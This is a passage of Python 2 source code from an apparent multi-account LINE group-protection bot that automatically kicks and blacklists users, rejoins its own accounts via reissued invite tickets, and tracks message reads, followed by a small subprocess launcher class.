elif op.param3 in kimid:
if op.param2 in ki5mid:
G = ki5.getGroup(op.param1)
G.preventJoinByTicket = False
ki5.updateGroup(G)
Ticket = ki5.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki5.updateGroup(G)
else:
G = ki5.getGroup(op.param1)
ki5.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki5.updateGroup(G)
Ticket = ki5.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki5.updateGroup(G)
elif op.param3 in ki5mid:
if op.param2 in kimid:
G = ki.getGroup(op.param1)
G.preventJoinByTicket = False
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki.updateGroup(G)
else:
G = ki.getGroup(op.param1)
ki.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
ki2.acceptGroupInvitationByTicket(op.param1,Ticket)
ki3.acceptGroupInvitationByTicket(op.param1,Ticket)
ki4.acceptGroupInvitationByTicket(op.param1,Ticket)
ki5.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki.updateGroup(G)
except:
pass
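# op.type 17 appears to fire when someone joins a group: while "protect" is on,
# blacklisted joiners are kicked out again, and unknown joiners (not admin, not a
# bot) just get a warning message.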
if op.type == 17:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
if wait["protect"] == True:
if wait["blacklist"][op.param2] == True:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
G = random.choice(KAC).getGroup(op.param1)
G.preventJoinByTicket = True
ki4.updateGroup(G)
# random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
# pass
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
G = random.choice(KAC).getGroup(op.param1)
G.preventJoinByTicket = True
random.choice(KAC).updateGroup(G)
# random.choice(KAK).kickoutFromGroup(op.param1,[op.param2])
except:
pass
elif op.param2 not in admin + Bots:
random.choice(KAC).sendText(op.param1,"Welcome. Don't Play Bots. I can kick you!")
else:
pass
if op.type == 19:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["protect"] == True:
wait ["blacklist"][op.param2] = True
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
else:
cl.sendText(op.param1,"")
else:
cl.sendText(op.param1,"")
if op.type == 13:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["inviteprotect"] == True:
wait ["blacklist"][op.param2] = True
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
else:
cl.sendText(op.param1,"")
else:
cl.sendText(op.param1,"")
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["inviteprotect"] == True:
wait ["blacklist"][op.param2] = True
cl.cancelGroupInvitation(op.param1,[op.param3])
else:
cl.sendText(op.param1,"")
else:
cl.sendText(op.param1,"")
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["cancelprotect"] == True:
wait ["blacklist"][op.param2] = True
cl.cancelGroupInvitation(op.param1,[op.param3])
else:
cl.sendText(op.param1,"")
else:
cl.sendText(op.param1,"")
if op.type == 11:
if op.param2 not in Bots:
if op.param2 in Bots:
pass
elif wait["linkprotect"] == True:
wait ["blacklist"][op.param2] = True
G = ki.getGroup(op.param1)
G.preventJoinByTicket = True
ki.updateGroup(G)
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
else:
cl.sendText(op.param1,"")
else:
cl.sendText(op.param1,"")
if op.type == 5:
if wait["autoAdd"] == True:
if (wait["message"] in [""," ","\n",None]):
pass
else:
cl.sendText(op.param1,str(wait["message"]))
#------Open QR Kick start------#
if op.type == 11:
if wait["linkprotect"] == True:
if op.param2 not in Bots:
G = random.choice(KAC).getGroup(op.param1)
G.preventJoinByTicket = True
random.choice(KAC).kickoutFromGroup(op.param1,[op.param3])
random.choice(KAC).updateGroup(G)
#------Open QR Kick finish-----#
#------------------------------------------------------------------------------------
#------------------------------------------------------------------------------------
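# op.type 55 ([NOTIFIED_READ_MESSAGE]): when a read point has been set for the chat,
# record each member's display name the first time they read, for the read-list
# feature stored in wait2.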
if op.type == 55:
print "[NOTIFIED_READ_MESSAGE]"
try:
if op.param1 in wait2['readPoint']:
Nama = cl.getContact(op.param2).displayName
if Nama in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n|| " + Nama
wait2['ROM'][op.param1][op.param2] = "|| " + Nama
wait2['setTime'][op.param1] = datetime.strftime(now2,"%H:%M")
else:
pass
except:
pass
if op.type == 59:
print op
except Exception as error:
print error
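# Helper for the clock feature: returns False on minutes that are multiples of ten
# and True otherwise. Its only call site inside nameUpdate() is commented out, so it
# is effectively unused here.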
def a2():
now2 = datetime.now()
nowT = datetime.strftime(now2,"%M")
if nowT in ["10","20","30","40","50","00"]:
return False
else:
return True
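# Background worker: while wait["clock"] is enabled, append the current time (HH:MM)
# to the stored base display name wait["cName"] and push the profile update roughly
# every ten minutes.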
def nameUpdate():
while True:
try:
#while a2():
#pass
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
time.sleep(600)
except:
pass
thread2 = threading.Thread(target=nameUpdate)
thread2.daemon = True
thread2.start()
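# Main loop: long-poll the operation feed, advance the stored revision to the highest
# one seen, and hand every operation except END_OF_OPERATION to bot() for dispatch.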
while True:
try:
Ops = cl.fetchOps(cl.Poll.rev, 5)
except EOFError:
raise Exception("It might be wrong revision\n" + str(cl.Poll.rev))
for Op in Ops:
if (Op.type != OpType.END_OF_OPERATION):
cl.Poll.rev = max(cl.Poll.rev, Op.revision)
bot(Op)
|
_strkick_process.py
|
import subprocess, threading, sys, os, time
###
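# Launcher wraps a child process started from a shell command: Start() spawns it with
# piped stdio and two daemon reader threads that buffer stderr/stdout into self.Output,
# Stop() terminates it (taskkill on Windows, kill elsewhere, or a custom stop command),
# and Tick() keeps the Tkinter start/stop/restart buttons assigned via AssignButtons()
# in a consistent enabled/disabled state.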
class Launcher(object):
def __init__(self, startcmd, stopcmd):
self.StartCmd = startcmd
self.StopCmd = stopcmd
self.SubProcess = None
self.Output = []
def CleanUp(self):
self.Stop()
def AssignButtons(self, startbtn, stopbtn, restartbnt):
self.StartBtn = startbtn
self.StopBtn = stopbtn
self.RestartBtn = restartbnt
def IsStarted(self):
if self.SubProcess is None: return False
if self.SubProcess.poll() is None: return True
#Perform cleaning
self.SubProcess.wait()
self.SubProcess = None
return False
def Tick(self):
#Check status ...
if self.IsStarted():
self.StartBtn.configure(state = "disabled")
self.StopBtn.configure(state = "normal")
self.RestartBtn.configure(state = "normal")
else:
self.StartBtn.configure(state = "normal")
self.StopBtn.configure(state = "disabled")
self.RestartBtn.configure(state = "disabled")
def Start(self):
if sys.platform == "win32":
kwargs = {}
else:
kwargs = {'close_fds':True}
print "Starting process", self.StartCmd
self.SubProcess = subprocess.Popen(self.StartCmd, shell=True, bufsize=0, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, **kwargs)
self.Output = []
t = threading.Thread(target=self._readerthread, args=('E', self.SubProcess.stderr))
t.setDaemon(True)
t.start()
t = threading.Thread(target=self._readerthread, args=('O', self.SubProcess.stdout))
t.setDaemon(True)
t.start()
def Stop(self):
if self.SubProcess is None: return
print "Stopping process", self.StopCmd
if self.StopCmd == 'KILL':
if sys.platform == "win32":
os.popen('taskkill /PID '+str(self.SubProcess.pid)+' /F /T')
else:
print 'kill ' + str(self.SubProcess.pid)
os.popen('kill ' + str(self.SubProcess.pid))
else:
os.popen(self.StopCmd)
self.SubProcess.wait()
self.SubProcess = None
def Restart(self):
self.Stop()
self.Start()
def PrintOutput(self):
print "====="
for s,l in self.Output:
print l
print "====="
def _readerthread(self, stype, handle):
try:
while self.SubProcess is not None:
buffer = handle.read()
if len(buffer) == 0:
time.sleep(0.5)
continue
self.Output.append((stype, buffer))
except:
print "!!!!! Exception in reader thread"
|